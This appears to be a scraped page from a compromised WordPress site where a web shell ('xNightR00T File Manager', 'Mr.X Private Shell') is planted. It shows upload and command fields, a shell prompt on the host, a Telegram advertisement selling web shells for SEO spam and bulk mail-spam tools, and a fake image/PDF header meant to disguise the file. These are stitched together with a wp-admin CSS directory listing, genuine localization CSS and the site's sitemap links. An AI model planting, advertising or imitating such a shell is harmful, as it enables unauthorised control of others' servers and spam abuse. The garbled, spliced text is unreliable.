xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
/*------------------------------------------------------------------------------
  27.0 - Localization
------------------------------------------------------------------------------*/

/* RTL except Hebrew (see below): Tahoma as the first font; */
body.rtl,
body.rtl .press-this a.wp-switch-editor {
	font-family: Tahoma, Arial, sans-serif;
}

/* Arial is best for RTL headings. */
.rtl h1,
.rtl h2,
.rtl h3,
.rtl h4,
.rtl h5,
.rtl h6 {
	font-family: Arial, sans-serif;
	font-weight: 600;
}

/* he_IL: Remove Tahoma from the font stack. Arial is best for Hebrew. */
body.locale-he-il,
body.locale-he-il .press-this a.wp-switch-editor {
	font-family: Arial, sans-serif;
}

/* he_IL: Have <em> be bold rather than italic. */
.locale-he-il em {
	font-style: normal;
	font-weight: 600;
}

/* zh_CN: Remove italic properties. */
.locale-zh-cn .howto,
.locale-zh-cn .tablenav .displaying-num,
.locale-zh-cn .js .input-with-default-title,
.locale-zh-cn .link-to-original,
.locale-zh-cn .inline-edit-row fieldset span.title,
.locale-zh-cn .inline-edit-row fieldset span.checkbox-title,
.locale-zh-cn #utc-time,
.locale-zh-cn #local-time,
.locale-zh-cn p.install-help,
.locale-zh-cn p.help,
.locale-zh-cn p.description,
.locale-zh-cn span.description,
.locale-zh-cn .form-wrap p {
	font-style: normal;
}

/* zh_CN: Enlarge dashboard widget 'Configure' link */
.locale-zh-cn .hdnle a { font-size: 12px; }

/* zn_CH: Enlarge font size, set font-size: normal */
.locale-zh-cn form.upgrade .hint { font-style: normal; font-size: 100%; }

/* zh_CN: Enlarge font-size. */
.locale-zh-cn #sort-buttons { font-size: 1em !important; }

/* de_DE: Text needs more space for translation */
.locale-de-de #customize-header-actions .button,
.locale-de-de-formal #customize-header-actions .button {
	padding: 0 5px 1px; /* default 0 10px 1px */
}
.locale-de-de #customize-header-actions .spinner,
.locale-de-de-formal #customize-header-actions .spinner {
	margin: 16px 3px 0; /* default 16px 4px 0 5px */
}

/* ru_RU: Text needs more room to breathe. */
.locale-ru-ru #adminmenu {
	width: inherit; /* back-compat for pre-3.2 */
}
.locale-ru-ru #adminmenu,
.locale-ru-ru #wpbody {
	margin-left: 0; /* back-compat for pre-3.2 */
}
.locale-ru-ru .inline-edit-row fieldset label span.title,
.locale-ru-ru .inline-edit-row fieldset.inline-edit-date legend {
	width: 8em; /* default 6em */
}
.locale-ru-ru .inline-edit-row fieldset label span.input-text-wrap,
.locale-ru-ru .inline-edit-row fieldset .timestamp-wrap {
	margin-left: 8em; /* default 6em */
}
.locale-ru-ru.post-php .tagsdiv .newtag,
.locale-ru-ru.post-new-php .tagsdiv .newtag {
	width: 165px; /* default 180px - 15px */
}
.locale-ru-ru.press-this .posting {
	margin-right: 277px; /* default 252px + 25px */
}
.locale-ru-ru .press-this-sidebar {
	width: 265px; /* default 240px + 25px */
}
.locale-ru-ru #customize-header-actions .button {
	padding: 0 5px 1px; /* default 0 10px 1px */
}
.locale-ru-ru #customize-header-actions .spinner {
	margin: 16px 3px 0; /* default 16px 4px 0 5px */
}

/* lt_LT: QuickEdit */
.locale-lt-lt .inline-edit-row fieldset label span.title,
.locale-lt-lt .inline-edit-row fieldset.inline-edit-date legend {
	width: 8em; /* default 6em */
}
.locale-lt-lt .inline-edit-row fieldset label span.input-text-wrap,
.locale-lt-lt .inline-edit-row fieldset .timestamp-wrap {
	margin-left: 8em; /* default 6em */
}

@media screen and (max-width: 782px) {
	.locale-ru-ru .inline-edit-row fieldset label span.input-text-wrap,
	.locale-ru-ru .inline-edit-row fieldset .timestamp-wrap,
	.locale-lt-lt .inline-edit-row fieldset label span.input-text-wrap,
	.locale-lt-lt .inline-edit-row fieldset .timestamp-wrap {
		margin-left: 0;
	}
}

Filemanager

Name Type Size Permission Actions
colors Folder 0755
about-rtl.css File 21.97 KB 0644
about-rtl.min.css File 16.74 KB 0644
about.css File 21.96 KB 0644
about.min.css File 16.73 KB 0644
admin-menu-rtl.css File 18.83 KB 0644
admin-menu-rtl.min.css File 15.14 KB 0644
admin-menu.css File 18.82 KB 0644
admin-menu.min.css File 15.12 KB 0644
code-editor-rtl.css File 1.54 KB 0644
code-editor-rtl.min.css File 1.4 KB 0644
code-editor.css File 1.54 KB 0644
code-editor.min.css File 1.4 KB 0644
color-picker-rtl.css File 3.55 KB 0644
color-picker-rtl.min.css File 2.85 KB 0644
color-picker.css File 3.55 KB 0644
color-picker.min.css File 2.84 KB 0644
common-rtl.css File 69.54 KB 0644
common-rtl.min.css File 52.76 KB 0644
common.css File 69.5 KB 0644
common.min.css File 52.72 KB 0644
customize-controls-rtl.css File 67.55 KB 0644
customize-controls-rtl.min.css File 56.64 KB 0644
customize-controls.css File 67.5 KB 0644
customize-controls.min.css File 56.59 KB 0644
customize-nav-menus-rtl.css File 21.47 KB 0644
customize-nav-menus-rtl.min.css File 17.68 KB 0644
customize-nav-menus.css File 21.46 KB 0644
customize-nav-menus.min.css File 17.67 KB 0644
customize-widgets-rtl.css File 12.09 KB 0644
customize-widgets-rtl.min.css File 9.5 KB 0644
customize-widgets.css File 12.09 KB 0644
customize-widgets.min.css File 9.49 KB 0644
dashboard-rtl.css File 23.32 KB 0644
dashboard-rtl.min.css File 18.43 KB 0644
dashboard.css File 23.32 KB 0644
dashboard.min.css File 18.43 KB 0644
deprecated-media-rtl.css File 6.48 KB 0644
deprecated-media-rtl.min.css File 5.4 KB 0644
deprecated-media.css File 6.47 KB 0644
deprecated-media.min.css File 5.4 KB 0644
edit-rtl.css File 28.12 KB 0644
edit-rtl.min.css File 22.18 KB 0644
edit.css File 28.12 KB 0644
edit.min.css File 22.17 KB 0644
farbtastic-rtl.css File 612 B 0644
farbtastic-rtl.min.css File 538 B 0644
farbtastic.css File 611 B 0644
farbtastic.min.css File 537 B 0644
forms-rtl.css File 31.09 KB 0644
forms-rtl.min.css File 23.7 KB 0644
forms.css File 31.08 KB 0644
forms.min.css File 23.7 KB 0644
ie-rtl.css File 11.65 KB 0644
ie-rtl.min.css File 10.05 KB 0644
ie.css File 11.64 KB 0644
ie.min.css File 10.04 KB 0644
install-rtl.css File 6 KB 0644
install-rtl.min.css File 5 KB 0644
install.css File 6 KB 0644
install.min.css File 5.01 KB 0644
l10n-rtl.css File 3.61 KB 0644
l10n-rtl.min.css File 2.42 KB 0644
l10n.css File 3.6 KB 0644
l10n.min.css File 2.42 KB 0644
list-tables-rtl.css File 39.37 KB 0644
list-tables-rtl.min.css File 31.94 KB 0644
list-tables.css File 39.34 KB 0644
list-tables.min.css File 31.92 KB 0644
login-rtl.css File 6.18 KB 0644
login-rtl.min.css File 4.96 KB 0644
login.css File 6.18 KB 0644
login.min.css File 4.96 KB 0644
media-rtl.css File 23.3 KB 0644
media-rtl.min.css File 18.85 KB 0644
media.css File 23.29 KB 0644
media.min.css File 18.84 KB 0644
nav-menus-rtl.css File 15.29 KB 0644
nav-menus-rtl.min.css File 12.03 KB 0644
nav-menus.css File 15.26 KB 0644
nav-menus.min.css File 12 KB 0644
revisions-rtl.css File 10.25 KB 0644
revisions-rtl.min.css File 8.41 KB 0644
revisions.css File 10.24 KB 0644
revisions.min.css File 8.4 KB 0644
site-health-rtl.css File 7.67 KB 0644
site-health-rtl.min.css File 6.38 KB 0644
site-health.css File 7.67 KB 0644
site-health.min.css File 6.37 KB 0644
site-icon-rtl.css File 1023 B 0644
site-icon-rtl.min.css File 746 B 0644
site-icon.css File 1021 B 0644
site-icon.min.css File 744 B 0644
themes-rtl.css File 38.87 KB 0644
themes-rtl.min.css File 30.69 KB 0644
themes.css File 38.85 KB 0644
themes.min.css File 30.67 KB 0644
widgets-rtl.css File 16.36 KB 0644
widgets-rtl.min.css File 13.43 KB 0644
widgets.css File 16.36 KB 0644
widgets.min.css File 13.43 KB 0644
wp-admin-rtl.css File 455 B 0644
wp-admin-rtl.min.css File 550 B 0644
wp-admin.css File 395 B 0644
wp-admin.min.css File 490 B 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml